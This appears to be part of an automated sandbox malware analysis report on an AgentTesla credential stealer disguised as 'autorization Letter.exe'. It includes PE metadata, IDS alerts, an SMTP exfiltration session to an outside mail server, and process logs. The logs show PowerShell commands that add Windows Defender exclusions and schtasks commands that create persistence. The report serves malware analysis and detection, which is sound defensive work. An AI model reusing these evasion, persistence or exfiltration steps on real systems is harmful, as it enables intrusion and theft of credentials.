                                                                Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                Error Number:-2146869232
                                                                Not Before, Not After
                                                                • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                                                Subject Chain
                                                                • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                Version:3
                                                                Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                Serial:7C1118CBBADC95DA3752C46E47A27438

                                                                Entrypoint Preview

                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xa059a0x4f.text
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xa20000x2b488.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0xca0000x3608
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xce0000xc.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x9f4380x70.text
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x20000x9e5f40x9e600b6a916eb4bb48054dc07953780c30cb4False0.9414401637726914data7.850552008247241IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rsrc0xa20000x2b4880x2b6002339f1b787e9ab0484f1c5ae87ff218dFalse0.22889836995677235data5.985036348981686IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0xce0000xc0x2003a1fc2d10edd7b039ba69dc6c4d84305False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0xa22b00x34a1PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9923550805314333
                                                                RT_ICON0xa57540x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.11334733230805631
                                                                RT_ICON0xb5f7c0x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 380160.17271915072524702
                                                                RT_ICON0xbf4240x5488Device independent bitmap graphic, 72 x 144 x 32, image size 216000.19371534195933457
                                                                RT_ICON0xc48ac0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.18192017005196032
                                                                RT_ICON0xc8ad40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.2454356846473029
                                                                RT_ICON0xcb07c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.28119136960600377
                                                                RT_ICON0xcc1240x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.3639344262295082
                                                                RT_ICON0xccaac0x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.44858156028368795
                                                                RT_GROUP_ICON0xccf140x84data0.7045454545454546
                                                                RT_VERSION0xccf980x304data0.43523316062176165
                                                                RT_MANIFEST0xcd29c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                Imports

                                                                DLLImport
                                                                mscoree.dll_CorExeMain

                                                                Network Behavior

                                                                Suricata IDS Alerts

                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-09-26T07:03:00.331719+02002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.549712192.185.129.60587TCP
                                                                2024-09-26T07:03:00.331719+02002839723ETPRO MALWARE Win32/Agent Tesla SMTP Activity1192.168.2.549712192.185.129.60587TCP
                                                                2024-09-26T07:03:00.331719+02002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.549712192.185.129.60587TCP
                                                                2024-09-26T07:03:14.516239+02002855245ETPRO MALWARE Agent Tesla Exfil via SMTP1192.168.2.549711192.185.129.60587TCP
                                                                2024-09-26T07:03:14.516239+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549711192.185.129.60587TCP
                                                                2024-09-26T07:03:18.387344+02002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.549711192.185.129.60587TCP
                                                                2024-09-26T07:03:18.387344+02002839723ETPRO MALWARE Win32/Agent Tesla SMTP Activity1192.168.2.549711192.185.129.60587TCP
                                                                2024-09-26T07:03:18.387344+02002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.549711192.185.129.60587TCP
                                                                2024-09-26T07:03:20.151372+02002855245ETPRO MALWARE Agent Tesla Exfil via SMTP1192.168.2.549712192.185.129.60587TCP
                                                                2024-09-26T07:03:20.151372+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549712192.185.129.60587TCP

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Sep 26, 2024 07:03:12.377485991 CEST49711587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:03:12.382375002 CEST58749711192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:12.384222031 CEST49711587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:03:13.070116997 CEST58749711192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:13.071027040 CEST49711587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:03:13.075896025 CEST58749711192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:13.247092009 CEST58749711192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:13.248347998 CEST49711587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:03:13.253300905 CEST58749711192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:13.414484978 CEST58749711192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:13.415596008 CEST49711587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:03:13.420527935 CEST58749711192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:13.787029982 CEST58749711192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:13.787302017 CEST49711587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:03:13.792212009 CEST58749711192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:13.962662935 CEST58749711192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:13.962903023 CEST49711587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:03:13.967840910 CEST58749711192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:14.343059063 CEST58749711192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:14.343246937 CEST49711587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:03:14.349797964 CEST58749711192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:14.515552998 CEST58749711192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:14.516191006 CEST49711587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:03:14.516238928 CEST49711587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:03:14.516266108 CEST49711587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:03:14.516287088 CEST49711587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:03:14.521111012 CEST58749711192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:14.521121979 CEST58749711192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:14.521246910 CEST58749711192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:14.521255970 CEST58749711192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:14.805124044 CEST58749711192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:14.847150087 CEST49711587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:03:18.278861046 CEST49712587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:03:18.283873081 CEST58749712192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:18.283981085 CEST49712587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:03:18.387343884 CEST49711587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:03:18.941123009 CEST58749712192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:18.941585064 CEST49712587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:03:18.946443081 CEST58749712192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:19.111865997 CEST58749712192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:19.112166882 CEST49712587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:03:19.117064953 CEST58749712192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:19.276999950 CEST58749712192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:19.277544022 CEST49712587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:03:19.282440901 CEST58749712192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:19.459836960 CEST58749712192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:19.460290909 CEST49712587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:03:19.465195894 CEST58749712192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:19.682753086 CEST58749712192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:19.682991028 CEST49712587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:03:19.687942028 CEST58749712192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:19.995276928 CEST58749712192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:19.995573997 CEST49712587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:03:20.000436068 CEST58749712192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:20.150343895 CEST58749712192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:20.151192904 CEST49712587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:03:20.151371956 CEST49712587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:03:20.151406050 CEST49712587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:03:20.151431084 CEST49712587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:03:20.156122923 CEST58749712192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:20.156244040 CEST58749712192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:20.156296015 CEST58749712192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:20.156367064 CEST58749712192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:20.422688961 CEST58749712192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:03:20.472306967 CEST49712587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:04:58.285280943 CEST49712587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:04:58.290091038 CEST58749712192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:04:58.651185989 CEST58749712192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:04:58.651284933 CEST58749712192.185.129.60192.168.2.5
                                                                Sep 26, 2024 07:04:58.651356936 CEST49712587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:04:58.651549101 CEST49712587192.168.2.5192.185.129.60
                                                                Sep 26, 2024 07:04:58.656380892 CEST58749712192.185.129.60192.168.2.5

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Sep 26, 2024 07:03:12.011574984 CEST6029753192.168.2.51.1.1.1
                                                                Sep 26, 2024 07:03:12.368562937 CEST53602971.1.1.1192.168.2.5

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Sep 26, 2024 07:03:12.011574984 CEST192.168.2.51.1.1.10x38e5Standard query (0)mail.unitechautomations.comA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Sep 26, 2024 07:03:12.368562937 CEST1.1.1.1192.168.2.50x38e5No error (0)mail.unitechautomations.com192.185.129.60A (IP address)IN (0x0001)false

                                                                SMTP Packets

                                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                                Sep 26, 2024 07:03:13.070116997 CEST58749711192.185.129.60192.168.2.5220-cp-ht-2.webhostbox.net ESMTP Exim 4.96.2 #2 Thu, 26 Sep 2024 10:33:12 +0530
                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                220 and/or bulk e-mail.
                                                                Sep 26, 2024 07:03:13.071027040 CEST49711587192.168.2.5192.185.129.60EHLO 878411
                                                                Sep 26, 2024 07:03:13.247092009 CEST58749711192.185.129.60192.168.2.5250-cp-ht-2.webhostbox.net Hello 878411 [8.46.123.33]
                                                                250-SIZE 52428800
                                                                250-8BITMIME
                                                                250-PIPELINING
                                                                250-PIPECONNECT
                                                                250-AUTH PLAIN LOGIN
                                                                250-STARTTLS
                                                                250 HELP
                                                                Sep 26, 2024 07:03:13.248347998 CEST49711587192.168.2.5192.185.129.60AUTH login ZGVzaWduQHVuaXRlY2hhdXRvbWF0aW9ucy5jb20=
                                                                Sep 26, 2024 07:03:13.414484978 CEST58749711192.185.129.60192.168.2.5334 UGFzc3dvcmQ6
                                                                Sep 26, 2024 07:03:13.787029982 CEST58749711192.185.129.60192.168.2.5235 Authentication succeeded
                                                                Sep 26, 2024 07:03:13.787302017 CEST49711587192.168.2.5192.185.129.60MAIL FROM:<design@unitechautomations.com>
                                                                Sep 26, 2024 07:03:13.962662935 CEST58749711192.185.129.60192.168.2.5250 OK
                                                                Sep 26, 2024 07:03:13.962903023 CEST49711587192.168.2.5192.185.129.60RCPT TO:<overseas1@vestalshipping.com.vn>
                                                                Sep 26, 2024 07:03:14.343059063 CEST58749711192.185.129.60192.168.2.5250 Accepted
                                                                Sep 26, 2024 07:03:14.343246937 CEST49711587192.168.2.5192.185.129.60DATA
                                                                Sep 26, 2024 07:03:14.515552998 CEST58749711192.185.129.60192.168.2.5354 Enter message, ending with "." on a line by itself
                                                                Sep 26, 2024 07:03:14.516287088 CEST49711587192.168.2.5192.185.129.60.
                                                                Sep 26, 2024 07:03:14.805124044 CEST58749711192.185.129.60192.168.2.5250 OK id=1stgeo-000KNK-1N
                                                                Sep 26, 2024 07:03:18.941123009 CEST58749712192.185.129.60192.168.2.5220-cp-ht-2.webhostbox.net ESMTP Exim 4.96.2 #2 Thu, 26 Sep 2024 10:33:18 +0530
                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                220 and/or bulk e-mail.
                                                                Sep 26, 2024 07:03:18.941585064 CEST49712587192.168.2.5192.185.129.60EHLO 878411
                                                                Sep 26, 2024 07:03:19.111865997 CEST58749712192.185.129.60192.168.2.5250-cp-ht-2.webhostbox.net Hello 878411 [8.46.123.33]
                                                                250-SIZE 52428800
                                                                250-8BITMIME
                                                                250-PIPELINING
                                                                250-PIPECONNECT
                                                                250-AUTH PLAIN LOGIN
                                                                250-STARTTLS
                                                                250 HELP
                                                                Sep 26, 2024 07:03:19.112166882 CEST49712587192.168.2.5192.185.129.60AUTH login ZGVzaWduQHVuaXRlY2hhdXRvbWF0aW9ucy5jb20=
                                                                Sep 26, 2024 07:03:19.276999950 CEST58749712192.185.129.60192.168.2.5334 UGFzc3dvcmQ6
                                                                Sep 26, 2024 07:03:19.459836960 CEST58749712192.185.129.60192.168.2.5235 Authentication succeeded
                                                                Sep 26, 2024 07:03:19.460290909 CEST49712587192.168.2.5192.185.129.60MAIL FROM:<design@unitechautomations.com>
                                                                Sep 26, 2024 07:03:19.682753086 CEST58749712192.185.129.60192.168.2.5250 OK
                                                                Sep 26, 2024 07:03:19.682991028 CEST49712587192.168.2.5192.185.129.60RCPT TO:<overseas1@vestalshipping.com.vn>
                                                                Sep 26, 2024 07:03:19.995276928 CEST58749712192.185.129.60192.168.2.5250 Accepted
                                                                Sep 26, 2024 07:03:19.995573997 CEST49712587192.168.2.5192.185.129.60DATA
                                                                Sep 26, 2024 07:03:20.150343895 CEST58749712192.185.129.60192.168.2.5354 Enter message, ending with "." on a line by itself
                                                                Sep 26, 2024 07:03:20.151431084 CEST49712587192.168.2.5192.185.129.60.
                                                                Sep 26, 2024 07:03:20.422688961 CEST58749712192.185.129.60192.168.2.5250 OK id=1stgeu-000KZI-0E
                                                                Sep 26, 2024 07:04:58.285280943 CEST49712587192.168.2.5192.185.129.60QUIT
                                                                Sep 26, 2024 07:04:58.651185989 CEST58749712192.185.129.60192.168.2.5221 cp-ht-2.webhostbox.net closing connection

                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:1
                                                                Start time:01:03:04
                                                                Start date:26/09/2024
                                                                Path:C:\Users\user\Desktop\autorization Letter.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\autorization Letter.exe"
                                                                Imagebase:0xe40000
                                                                File size:841'224 bytes
                                                                MD5 hash:457F6CB01C6F3F7922AC201F70111AE5
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2160081111.0000000004429000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.2160081111.0000000004429000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:3
                                                                Start time:01:03:08
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe"
                                                                Imagebase:0xb0000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:4
                                                                Start time:01:03:08
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:5
                                                                Start time:01:03:08
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tIFjYTCo.exe"
                                                                Imagebase:0xb0000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:6
                                                                Start time:01:03:08
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:7
                                                                Start time:01:03:08
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmpF639.tmp"
                                                                Imagebase:0x190000
                                                                File size:187'904 bytes
                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:8
                                                                Start time:01:03:08
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:9
                                                                Start time:01:03:09
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                Imagebase:0x610000
                                                                File size:45'984 bytes
                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2202666103.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2202666103.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2204151615.000000000288A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2204151615.0000000002882000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2204151615.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2204151615.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:10
                                                                Start time:01:03:09
                                                                Start date:26/09/2024
                                                                Path:C:\Users\user\AppData\Roaming\tIFjYTCo.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Roaming\tIFjYTCo.exe
                                                                Imagebase:0x1b0000
                                                                File size:841'224 bytes
                                                                MD5 hash:457F6CB01C6F3F7922AC201F70111AE5
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 58%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:11
                                                                Start time:01:03:11
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                Imagebase:0x7ff6ef0c0000
                                                                File size:496'640 bytes
                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                Has elevated privileges:true
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:12
                                                                Start time:01:03:15
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmp1162.tmp"
                                                                Imagebase:0x190000
                                                                File size:187'904 bytes
                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:13
                                                                Start time:01:03:15
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:14
                                                                Start time:01:03:15
                                                                Start date:26/09/2024
